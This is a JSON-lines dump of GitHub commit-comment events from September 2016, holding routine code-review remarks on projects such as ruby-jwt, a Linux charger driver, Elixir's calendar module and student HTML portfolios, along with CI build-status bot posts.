{"id":"4576797752","type":"CommitCommentEvent","actor":{"login":"btalbot"},"repo":{"name":"jwt/ruby-jwt"},"payload":{"comment":{"id":19061403,"position":24,"line":26,"path":"lib/jwt/verify.rb","commit_id":"f2cea99fbc44b001509fbb48db2d95a398b85157","created_at":"2016-09-16T23:01:58Z","updated_at":"2016-09-16T23:01:58Z","body":"options_aud used to be allowed to be a symbol (or array of symbols) but this commit breaks that when the options_aud.to_s was removed. Is that intentional? I'm sure there must be many users that have used \r\n\r\nJWT.decode(payload,key,true, aud: :myaud, verify_aud: true)\r\n\r\nwhich this would break."}},"created_at":"2016-09-16T23:01:58Z"}
{"id":"4576798376","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":19061406,"position":15,"line":15,"path":"project-milestone-02/index.html","commit_id":"4e9eb14f585fbf7304642ac1934676d5461fd396","created_at":"2016-09-16T23:02:10Z","updated_at":"2016-09-16T23:02:10Z","body":"How can you incorporate ul, li, and a tags into your <nav> tag? "}},"created_at":"2016-09-16T23:02:10Z"}
{"id":"4576798695","type":"CommitCommentEvent","actor":{"login":"TexasRed"},"repo":{"name":"apache/aurora"},"payload":{"comment":{"id":19061407,"position":null,"line":null,"path":null,"commit_id":"e67c6a732c00786bc74d63d4fb2b9f5f398c5435","created_at":"2016-09-16T23:02:17Z","updated_at":"2016-09-16T23:02:17Z","body":"Updating pants version to 1.1.0-rc7 seems to break the script: https://github.com/apache/aurora/blob/e67c6a732c00786bc74d63d4fb2b9f5f398c5435/build-support/python/make-pycharm-virtualenv#L24\r\nException was thrown at line 24. A Pycharm project is generated with a incomplete list of packages. \r\n\r\nI was wondering if someone can work on it and fix this issue? Thanks!"}},"created_at":"2016-09-16T23:02:17Z"}
{"id":"4576799281","type":"CommitCommentEvent","actor":{"login":"ZombieRoxtar"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19061409,"position":124,"line":124,"path":"LxssLoader/main.cpp","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-16T23:02:28Z","updated_at":"2016-09-16T23:02:28Z","body":"The process (whatever it be) has always returned zero in 100% of tests. Um, if Python fails to start, I doubt it matters if it's script or shell."}},"created_at":"2016-09-16T23:02:28Z"}
{"id":"4576800211","type":"CommitCommentEvent","actor":{"login":"wkeese"},"repo":{"name":"brunano21/deliteful"},"payload":{"comment":{"id":19061416,"position":6,"line":257,"path":"Combobox.js","commit_id":"43b46217f1a746e36edc61c5d1f4c270f03b112b","created_at":"2016-09-16T23:02:47Z","updated_at":"2016-09-16T23:02:47Z","body":"boolean should be lowercase"}},"created_at":"2016-09-16T23:02:47Z"}
{"id":"4576801967","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19061421,"position":null,"line":null,"path":null,"commit_id":"dd333cd77417360a57eef9b9fe61c73419801c39","created_at":"2016-09-16T23:03:23Z","updated_at":"2016-09-16T23:03:23Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-MacOS-10.9-clang: OK (2331 of 2331 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dd333cd77417360a57eef9b9fe61c73419801c39-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dd333cd77417360a57eef9b9fe61c73419801c39-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-16T23:03:23Z"}
{"id":"4576803223","type":"CommitCommentEvent","actor":{"login":"mranostay"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19061425,"position":24,"line":1232,"path":"drivers/power/bq24190_charger.c","commit_id":"280d3a3a5e3cc20281ec4f682fd2f086ecfdc33b","created_at":"2016-09-16T23:03:48Z","updated_at":"2016-09-16T23:03:48Z","body":"Static array shouldn't be in the function.."}},"created_at":"2016-09-16T23:03:48Z"}
{"id":"4576805202","type":"CommitCommentEvent","actor":{"login":"excpt"},"repo":{"name":"jwt/ruby-jwt"},"payload":{"comment":{"id":19061429,"position":24,"line":26,"path":"lib/jwt/verify.rb","commit_id":"f2cea99fbc44b001509fbb48db2d95a398b85157","created_at":"2016-09-16T23:04:09Z","updated_at":"2016-09-16T23:04:09Z","body":"Correct. Setting up a fix."}},"created_at":"2016-09-16T23:04:09Z"}
{"id":"4576805409","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/Homebrew.jl"},"payload":{"comment":{"id":19061431,"position":null,"line":null,"path":null,"commit_id":"2975acf61d45930a44869d9a9a201e15c13ef2f8","created_at":"2016-09-16T23:04:14Z","updated_at":"2016-09-16T23:04:14Z","body":"@staticfloat you may have not gotten a notification, but go through CI first"}},"created_at":"2016-09-16T23:04:14Z"}
{"id":"4576807182","type":"CommitCommentEvent","actor":{"login":"wkeese"},"repo":{"name":"brunano21/deliteful"},"payload":{"comment":{"id":19061436,"position":38,"line":450,"path":"Combobox.js","commit_id":"43b46217f1a746e36edc61c5d1f4c270f03b112b","created_at":"2016-09-16T23:04:51Z","updated_at":"2016-09-16T23:04:51Z","body":"No need for the third argument of `this`; that's the default."}},"created_at":"2016-09-16T23:04:51Z"}
{"id":"4576807598","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":19061437,"position":218,"line":758,"path":"lib/elixir/lib/calendar.ex","commit_id":"e50735ff2a7c16cc7705d8fa59af906e986c19f7","created_at":"2016-09-16T23:05:00Z","updated_at":"2016-09-16T23:05:00Z","body":"I don't like the to_gregorian ones because that's specific to one calendar.\nIt would be nice to have an implementation that works on any calendar.\n\nAnother thing I realized is that this is doing a difference between two\ndates or two times. So maybe we should rather implement difference for all\nthree of them with precision as argument? If we also have the ability to\nadd seconds with a given precision, we have all of this functionality for\nfree.\n\nOn Saturday, September 17, 2016, Lau Taarnskov <notifications@github.com>\nwrote:\n\n> Yes I was thinking something like that too. Does to_integer describe\n> enough though? to_unix on DateTime also returns an integer. How about these\n> function names? Still with the precision arguments when applicable.\n>\n> Time.to_second_in_day\n> Time.from_second_in_day\n>\n> Date.to_gregorian_days\n> Date.from_gregorian_days\n>\n> NaiveDateTime.to_gregorian_seconds\n> NaiveDateTime.from_gregorian_seconds\n>\n> And maybe for DateTime also to_gregorian_seconds which would do the same\n> thing as the function in NaiveDateTime. Have you considered letting e.g.\n> NaiveDateTime.to_gregorian_seconds accept a DateTime and this function\n> definition would just ignore the non-naive parts of the DateTime struct.\n>\n> If Ecto then has the epochs (e.g. diff between year 1970 and year 0) that\n> it can then add/subtract, wouldn't that be enough to accomplish what you\n> need? Again using the unix epoch outside of UTC is a \"custom\", non standard\n> use so it would make sense that it would be in Ecto.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/elixir-lang/elixir/commit/e50735ff2a7c16cc7705d8fa59af906e986c19f7#commitcomment-19061208>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAAlbmt39Z57g--GR5G_l3nrKlvveoanks5qqxqygaJpZM4J9T_e>\n> .\n>\n\n\n-- \n\n\n*José Valimwww.plataformatec.com.br\n<http://www.plataformatec.com.br/>Founder and Director of R&D*\n"}},"created_at":"2016-09-16T23:05:00Z"}
{"id":"4576807881","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19061439,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-16T23:05:08Z","updated_at":"2016-09-16T23:05:08Z","body":"The latter...\r\nNo."}},"created_at":"2016-09-16T23:05:08Z"}
{"id":"4576808113","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":19061440,"position":40,"line":40,"path":"project-milestone-02/index.html","commit_id":"4e9eb14f585fbf7304642ac1934676d5461fd396","created_at":"2016-09-16T23:05:12Z","updated_at":"2016-09-16T23:05:12Z","body":"I think this would work better as an <img> tag, and having the image directly in your HTML instead of a background image.  Because, in a portfolio, the image itself is piece of content, rather than just a background.  "}},"created_at":"2016-09-16T23:05:12Z"}
{"id":"4576808257","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19061441,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-16T23:05:14Z","updated_at":"2016-09-16T23:05:14Z","body":"Odd pseudo-cognate."}},"created_at":"2016-09-16T23:05:14Z"}
{"id":"4576808407","type":"CommitCommentEvent","actor":{"login":"mranostay"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19061443,"position":42,"line":1274,"path":"drivers/power/bq24190_charger.c","commit_id":"280d3a3a5e3cc20281ec4f682fd2f086ecfdc33b","created_at":"2016-09-16T23:05:17Z","updated_at":"2016-09-16T23:05:17Z","body":"\r\nNo reason for battery_mask_ss[0]   should be BQ24190_REG_SS_CHRG_STAT_MASK or if you want a shorter name use a #define "}},"created_at":"2016-09-16T23:05:17Z"}
{"id":"4576812210","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":19061455,"position":44,"line":44,"path":"project-milestone-02/index.html","commit_id":"4e9eb14f585fbf7304642ac1934676d5461fd396","created_at":"2016-09-16T23:06:34Z","updated_at":"2016-09-16T23:06:34Z","body":"I would also be inclined to use `<div>` instead of an <article> here, because it isn't a piece of standalone content...it couldn't appear in an email or an rss feed and make sense like a news article would. "}},"created_at":"2016-09-16T23:06:34Z"}
{"id":"4576813652","type":"CommitCommentEvent","actor":{"login":"ErikPshat"},"repo":{"name":"Rinnegatamante/rinCheat"},"payload":{"comment":{"id":19061460,"position":null,"line":null,"path":null,"commit_id":"c3e59753ea90693cf1767327518751feb250d9f1","created_at":"2016-09-16T23:07:06Z","updated_at":"2016-09-16T23:07:06Z","body":"What is China sucks? Kindergarten or Nazism?"}},"created_at":"2016-09-16T23:07:06Z"}
{"id":"4576813827","type":"CommitCommentEvent","actor":{"login":"matthayes"},"repo":{"name":"confluentinc/confluent-kafka-python"},"payload":{"comment":{"id":19061461,"position":10,"line":37,"path":"confluent_kafka/avro/avro_producer.py","commit_id":"f7f4d9821c1e5b1ffdf1b48db38ee619c026ba61","created_at":"2016-09-16T23:07:09Z","updated_at":"2016-09-16T23:07:09Z","body":"I don't think you need `*args`"}},"created_at":"2016-09-16T23:07:09Z"}
{"id":"4576815105","type":"CommitCommentEvent","actor":{"login":"wkeese"},"repo":{"name":"brunano21/deliteful"},"payload":{"comment":{"id":19061464,"position":111,"line":743,"path":"Combobox.js","commit_id":"43b46217f1a746e36edc61c5d1f4c270f03b112b","created_at":"2016-09-16T23:07:35Z","updated_at":"2016-09-16T23:07:35Z","body":"Seems like you can just setup this `query-success` listener once, and get rid of the `queryListener.remove(queryListener)` call?   (Also, `remove()` doesn't take an argument.)"}},"created_at":"2016-09-16T23:07:35Z"}
{"id":"4576817778","type":"CommitCommentEvent","actor":{"login":"rianby64"},"repo":{"name":"m3co/m3c-cuentas-client"},"payload":{"comment":{"id":19061471,"position":null,"line":null,"path":null,"commit_id":"7d27a1d526e67b360e0e424be267678eb7bef3f2","created_at":"2016-09-16T23:08:31Z","updated_at":"2016-09-16T23:08:31Z","body":"Solucion parcial para #3 "}},"created_at":"2016-09-16T23:08:31Z"}
{"id":"4576819145","type":"CommitCommentEvent","actor":{"login":"rianby64"},"repo":{"name":"m3co/m3c-cuentas-client"},"payload":{"comment":{"id":19061476,"position":null,"line":null,"path":null,"commit_id":"ba8c6a1359ae3ea96e57461fb5f65911e92243d7","created_at":"2016-09-16T23:08:59Z","updated_at":"2016-09-16T23:08:59Z","body":"Solucion parcial para #3 "}},"created_at":"2016-09-16T23:08:59Z"}
{"id":"4576819646","type":"CommitCommentEvent","actor":{"login":"rianby64"},"repo":{"name":"m3co/m3c-cuentas-client"},"payload":{"comment":{"id":19061477,"position":null,"line":null,"path":null,"commit_id":"64ddc667c7733c927dcda960f00180ee2413ec2b","created_at":"2016-09-16T23:09:10Z","updated_at":"2016-09-16T23:09:10Z","body":"Solucion parcial para #3 "}},"created_at":"2016-09-16T23:09:10Z"}
{"id":"4576820115","type":"CommitCommentEvent","actor":{"login":"rianby64"},"repo":{"name":"m3co/m3c-cuentas-client"},"payload":{"comment":{"id":19061478,"position":null,"line":null,"path":null,"commit_id":"c9936052d9edd8b9b3f1e6f0173736e89c6f54ce","created_at":"2016-09-16T23:09:20Z","updated_at":"2016-09-16T23:09:20Z","body":"Solucion parcial para #3 "}},"created_at":"2016-09-16T23:09:20Z"}
{"id":"4576820887","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19061481,"position":null,"line":null,"path":null,"commit_id":"13627153888d3ac71645178a674491bc8151b8b6","created_at":"2016-09-16T23:09:36Z","updated_at":"2016-09-16T23:09:36Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2371 of 2371 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-16T23:09:36Z"}
{"id":"4576825962","type":"CommitCommentEvent","actor":{"login":"jecisc"},"repo":{"name":"LeCoinEnBande/OOnoz"},"payload":{"comment":{"id":19061496,"position":null,"line":null,"path":null,"commit_id":"02527b40d4c1a2f09c6b40607996ab0197075084","created_at":"2016-09-16T23:11:31Z","updated_at":"2016-09-16T23:11:31Z","body":"It still need some love with the scss "}},"created_at":"2016-09-16T23:11:31Z"}
{"id":"4576828121","type":"CommitCommentEvent","actor":{"login":"ddugovic"},"repo":{"name":"ddugovic/Stockfish"},"payload":{"comment":{"id":19061502,"position":null,"line":null,"path":null,"commit_id":"548ad02241e0b3ca2938e96ac9c63abf5fa87f06","created_at":"2016-09-16T23:12:17Z","updated_at":"2016-09-16T23:12:17Z","body":"You are correct, those possible causes exist where upstream changes caused merge conflicts and forced changes in this fork."}},"created_at":"2016-09-16T23:12:17Z"}
{"id":"4576829140","type":"CommitCommentEvent","actor":{"login":"wkeese"},"repo":{"name":"brunano21/deliteful"},"payload":{"comment":{"id":19061506,"position":null,"line":null,"path":null,"commit_id":"72c74d6b89b560187d0764712baa1ddbf44ea6da","created_at":"2016-09-16T23:12:39Z","updated_at":"2016-09-16T23:12:39Z","body":"You removed it from Combobox.js but forgot to remove it from ComboPopup.js."}},"created_at":"2016-09-16T23:12:39Z"}
{"id":"4576829205","type":"CommitCommentEvent","actor":{"login":"TheRingMaster"},"repo":{"name":"TeslaRom-N/packages_apps_Settings"},"payload":{"comment":{"id":19061507,"position":null,"line":null,"path":null,"commit_id":"18441f77ea550f50bc456837dd704ef5081ffd35","created_at":"2016-09-16T23:12:40Z","updated_at":"2016-09-16T23:12:40Z","body":"ditto!!"}},"created_at":"2016-09-16T23:12:40Z"}
{"id":"4576832133","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19061516,"position":null,"line":null,"path":null,"commit_id":"13627153888d3ac71645178a674491bc8151b8b6","created_at":"2016-09-16T23:13:45Z","updated_at":"2016-09-16T23:13:45Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-16T23:13:45Z"}
{"id":"4576834425","type":"CommitCommentEvent","actor":{"login":"borisgodet"},"repo":{"name":"cedric222/jeedom-piface"},"payload":{"comment":{"id":19061523,"position":null,"line":null,"path":null,"commit_id":"7ad9ce3a6d62538d69d410c715cfedabef3e1d5d","created_at":"2016-09-16T23:14:37Z","updated_at":"2016-09-16T23:14:37Z","body":"Hello, to make it work I needed the piface-web.py to run as root, therefore I had to change the php script \r\n/usr/share/nginx/www/jeedom/plugins/piface2/core/class/piface2.class.php\r\nand add sudo -u www-data to the original code\r\n\u0000$cmd = \"_sudo -u www-data_ /usr/bin/nice -n 19 /usr/bin/python \".$piface2_path.\" \".$port;\r\nWorks perfect now. \r\nBoris. \r\n(Rpi2 + piface2)"}},"created_at":"2016-09-16T23:14:37Z"}
{"id":"4576845162","type":"CommitCommentEvent","actor":{"login":"cropredy"},"repo":{"name":"financialforcedev/fflib-apex-common"},"payload":{"comment":{"id":19061545,"position":null,"line":null,"path":null,"commit_id":"183329cc62e9d30f526296b0790bac0655bc7038","created_at":"2016-09-16T23:18:33Z","updated_at":"2016-09-16T23:18:33Z","body":"Line 40 is in error - map keys are all lowercase so use `containsIgnoreCase('CurrencyIsoCode')` or `contains('currencyisocode')`"}},"created_at":"2016-09-16T23:18:33Z"}
{"id":"4576846701","type":"CommitCommentEvent","actor":{"login":"mranostay"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19061554,"position":61,"line":1297,"path":"drivers/power/bq24190_charger.c","commit_id":"280d3a3a5e3cc20281ec4f682fd2f086ecfdc33b","created_at":"2016-09-16T23:19:06Z","updated_at":"2016-09-16T23:19:06Z","body":"Not sure what you are doing here :)"}},"created_at":"2016-09-16T23:19:06Z"}
{"id":"4576846857","type":"CommitCommentEvent","actor":{"login":"Adelphos"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19061555,"position":3,"line":3,"path":"css/0_sass_variables.scss","commit_id":"89878ce2e7caae267f6f616117de3ac67bcb63cc","created_at":"2016-09-16T23:19:10Z","updated_at":"2016-09-16T23:19:10Z","body":"-ink? "}},"created_at":"2016-09-16T23:19:10Z"}
{"id":"4576847833","type":"CommitCommentEvent","actor":{"login":"Oleiva"},"repo":{"name":"art07/RepositoryGoIT"},"payload":{"comment":{"id":19061558,"position":30,"line":30,"path":"GoIT_Project_1/src/module_5_homework/BookingComAPI.java","commit_id":"ab450d450535d429b69283ce9a2fa60c24196a6b","created_at":"2016-09-16T23:19:30Z","updated_at":"2016-09-16T23:19:30Z","body":"Чисто теоретически, ты должен искать не точное соответствие а на условия отсечения. То есть: Все n комнатные номера не дороже такой суммы, которые свободны к такому числу в таком отеле. Но, пусть будет так.. "}},"created_at":"2016-09-16T23:19:30Z"}
{"id":"4576848992","type":"CommitCommentEvent","actor":{"login":"mranostay"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19061560,"position":58,"line":1294,"path":"drivers/power/bq24190_charger.c","commit_id":"280d3a3a5e3cc20281ec4f682fd2f086ecfdc33b","created_at":"2016-09-16T23:19:58Z","updated_at":"2016-09-16T23:19:58Z","body":"Why scan through all the bitmasks? why not just 0x1f ?"}},"created_at":"2016-09-16T23:19:58Z"}
{"id":"4576850021","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"pkp/ojs"},"payload":{"comment":{"id":19061562,"position":30,"line":50,"path":"plugins/importexport/native/locale/en_US/locale.xml","commit_id":"92823b17655eb48aa076c65072e132e993d73f39","created_at":"2016-09-16T23:20:20Z","updated_at":"2016-09-16T23:20:20Z","body":"It's not -- I'll let `file_put_contents` report errors and remove this key."}},"created_at":"2016-09-16T23:20:20Z"}
{"id":"4576850026","type":"CommitCommentEvent","actor":{"login":"mranostay"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19061563,"position":4,"line":144,"path":"drivers/power/bq24190_charger.c","commit_id":"280d3a3a5e3cc20281ec4f682fd2f086ecfdc33b","created_at":"2016-09-16T23:20:20Z","updated_at":"2016-09-16T23:20:20Z","body":"Has to be some existing macro for this... @tmlind ?"}},"created_at":"2016-09-16T23:20:20Z"}
{"id":"4576853352","type":"CommitCommentEvent","actor":{"login":"Adelphos"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19061577,"position":197,"line":30,"path":"css/1_header.scss","commit_id":"89878ce2e7caae267f6f616117de3ac67bcb63cc","created_at":"2016-09-16T23:21:36Z","updated_at":"2016-09-16T23:21:36Z","body":"Generally speaking, used kebab-case for CSS and camelCase for JS stuff.\r\n\r\nyou can combine them, for example:\r\n`<button class=\"btnOpen btn-open\">Open</button>`\r\n`.btn-open {\r\n  border-radius: 5px;\r\n}`\r\n`$('.btnOpen').on('click', function(){\r\n  // do something\r\n});`"}},"created_at":"2016-09-16T23:21:36Z"}
{"id":"4576854241","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"pkp/ojs"},"payload":{"comment":{"id":19061581,"position":84,"line":287,"path":"plugins/importexport/native/NativeImportExportPlugin.inc.php","commit_id":"92823b17655eb48aa076c65072e132e993d73f39","created_at":"2016-09-16T23:21:57Z","updated_at":"2016-09-16T23:21:57Z","body":"Yes, I just caught and fixed that, thanks!"}},"created_at":"2016-09-16T23:21:57Z"}
{"id":"4576854251","type":"CommitCommentEvent","actor":{"login":"prorokeus"},"repo":{"name":"prorokeus/elements"},"payload":{"comment":{"id":19061582,"position":null,"line":null,"path":null,"commit_id":"ac7f89541b32e6f311a0d03e789b929523b9cc57","created_at":"2016-09-16T23:21:57Z","updated_at":"2016-09-16T23:21:57Z","body":"Creating variables for the shadow drop, inner , both.\r\n\r\nSo easy to maintain and control the fadeout and fadein need not replicate the speech but only the variable \"face\".\r\n@fade: fadeout(@color, 100 - ( @alpha*100 ));"}},"created_at":"2016-09-16T23:21:57Z"}
{"id":"4576854679","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"rrdesai/dsp"},"payload":{"comment":{"id":19061583,"position":null,"line":null,"path":null,"commit_id":"c98ffdba185fe33d2f06e216a3468d62dc7b11ff","created_at":"2016-09-16T23:22:06Z","updated_at":"2016-09-16T23:22:06Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @rrdesai \r\n\r\nNice work on Python! Here are some comments:\r\n- Q1: Lists are often used to store items of different types. For example you could have a list of lists, in which each \"sublist\" contains the name of a person, his or her education level, date of birth, email, etc.\r\n- It might be nice for you to review some markdown tips. Here is a [cheatsheet](https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet).\r\n- Q6 (string functions): At line 28: it should be `if len(s) >= 2:`.\r\n- Q6, function `fix_start`: In general it is not very efficient to manipulate strings by first converting them into lists. Try using the `replace()` method on strings for this problem.\r\n- Q6, function `mix_up` is not working correctly on the examples given.\r\n- You might want to remove the `raise NotImplementedError` from your code.\r\n- Q8 (parsing): you should take the absolute value of the difference between `Goals` and `Goals Allowed`, otherwise the code gives the wrong result.\r\n\r\n👍 "}},"created_at":"2016-09-16T23:22:06Z"}
{"id":"4576855791","type":"CommitCommentEvent","actor":{"login":"ndarville"},"repo":{"name":"kenaniah/chrome-navigation-plugin"},"payload":{"comment":{"id":19061587,"position":null,"line":null,"path":null,"commit_id":"9337c503a48ef11538b0e5fcef20ae49ca52ece5","created_at":"2016-09-16T23:22:28Z","updated_at":"2016-09-16T23:22:28Z","body":"When is this being pushed to the app store? Leaving the extension disabled for now. :)"}},"created_at":"2016-09-16T23:22:28Z"}
{"id":"4576858370","type":"CommitCommentEvent","actor":{"login":"excpt"},"repo":{"name":"jwt/ruby-jwt"},"payload":{"comment":{"id":19061595,"position":24,"line":26,"path":"lib/jwt/verify.rb","commit_id":"f2cea99fbc44b001509fbb48db2d95a398b85157","created_at":"2016-09-16T23:23:26Z","updated_at":"2016-09-16T23:23:26Z","body":"PR #166 "}},"created_at":"2016-09-16T23:23:26Z"}
{"id":"4576858646","type":"CommitCommentEvent","actor":{"login":"mdusman1982"},"repo":{"name":"mdusman1982/website"},"payload":{"comment":{"id":19061596,"position":null,"line":null,"path":null,"commit_id":"67a4bb8a19fa1d284c17f17cf959f4f6bb76948e","created_at":"2016-09-16T23:23:32Z","updated_at":"2016-09-16T23:23:32Z","body":"Associating with Issue #3 "}},"created_at":"2016-09-16T23:23:32Z"}
{"id":"4576859570","type":"CommitCommentEvent","actor":{"login":"Adelphos"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19061598,"position":189,"line":22,"path":"css/1_header.scss","commit_id":"89878ce2e7caae267f6f616117de3ac67bcb63cc","created_at":"2016-09-16T23:23:55Z","updated_at":"2016-09-16T23:23:55Z","body":"don't use numbers in your CSS or JS -- it's not descriptive enough."}},"created_at":"2016-09-16T23:23:55Z"}
{"id":"4576860801","type":"CommitCommentEvent","actor":{"login":"Adelphos"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19061602,"position":312,"line":145,"path":"css/1_header.scss","commit_id":"89878ce2e7caae267f6f616117de3ac67bcb63cc","created_at":"2016-09-16T23:24:23Z","updated_at":"2016-09-16T23:24:23Z","body":"make this a variable."}},"created_at":"2016-09-16T23:24:23Z"}
{"id":"4576862365","type":"CommitCommentEvent","actor":{"login":"Adelphos"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19061604,"position":196,"line":29,"path":"css/1_header.scss","commit_id":"89878ce2e7caae267f6f616117de3ac67bcb63cc","created_at":"2016-09-16T23:24:58Z","updated_at":"2016-09-16T23:24:58Z","body":"Also, don't use numbers in your file names. Just name this one header.scss."}},"created_at":"2016-09-16T23:24:58Z"}
{"id":"4576870434","type":"CommitCommentEvent","actor":{"login":"Adelphos"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19061616,"position":null,"line":null,"path":null,"commit_id":"89878ce2e7caae267f6f616117de3ac67bcb63cc","created_at":"2016-09-16T23:27:33Z","updated_at":"2016-09-16T23:27:33Z","body":"Sweet, looking good."}},"created_at":"2016-09-16T23:27:33Z"}
{"id":"4576874455","type":"CommitCommentEvent","actor":{"login":"DoctorMcKay"},"repo":{"name":"DoctorMcKay/node-steamcommunity"},"payload":{"comment":{"id":19061630,"position":36,"line":315,"path":"index.js","commit_id":"1b60712b8bd164505ff199b4ed86c2a017f7bb5e","created_at":"2016-09-16T23:29:03Z","updated_at":"2016-09-16T23:29:03Z","body":"Yep, that's it. Thanks."}},"created_at":"2016-09-16T23:29:03Z"}
{"id":"4576883129","type":"CommitCommentEvent","actor":{"login":"Oleiva"},"repo":{"name":"art07/RepositoryGoIT"},"payload":{"comment":{"id":19061654,"position":32,"line":32,"path":"GoIT_Project_1/src/module_5_homework/BookingComAPI.java","commit_id":"ab450d450535d429b69283ce9a2fa60c24196a6b","created_at":"2016-09-16T23:32:27Z","updated_at":"2016-09-16T23:32:27Z","body":"Зачем ты лезешь в контроллер ? У тебя есть массив rooms и есть входные параметры и тебе нужно найти и в rooms соответствие. "}},"created_at":"2016-09-16T23:32:27Z"}
{"id":"4576885095","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19061660,"position":null,"line":null,"path":null,"commit_id":"a19ddcc005bd09857724e451c8c241b5e1660b8e","created_at":"2016-09-16T23:33:17Z","updated_at":"2016-09-16T23:33:17Z","body":"develop (mjwitte) - x86_64-MacOS-10.9-clang: OK (1763 of 1763 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-16T23:33:17Z"}
{"id":"4576885214","type":"CommitCommentEvent","actor":{"login":"zepster"},"repo":{"name":"zepster/qq"},"payload":{"comment":{"id":19061661,"position":75,"line":84,"path":"lib/client.php","commit_id":"55b46c0c691225935218a35b613dee5105b55497","created_at":"2016-09-16T23:33:20Z","updated_at":"2016-09-16T23:33:20Z","body":"наверно первый форич лишний"}},"created_at":"2016-09-16T23:33:20Z"}
{"id":"4576887034","type":"CommitCommentEvent","actor":{"login":"amy-b"},"repo":{"name":"amy-b/finalProject"},"payload":{"comment":{"id":19061664,"position":17,"line":17,"path":"index.html","commit_id":"460f5de1ee88377109bd03028b20f63f4736e6da","created_at":"2016-09-16T23:34:04Z","updated_at":"2016-09-16T23:34:04Z","body":"Hi Barry, this comment looks a little strange. Which tag did you refer to? I think it got cut out of the comment.\r\n"}},"created_at":"2016-09-16T23:34:04Z"}
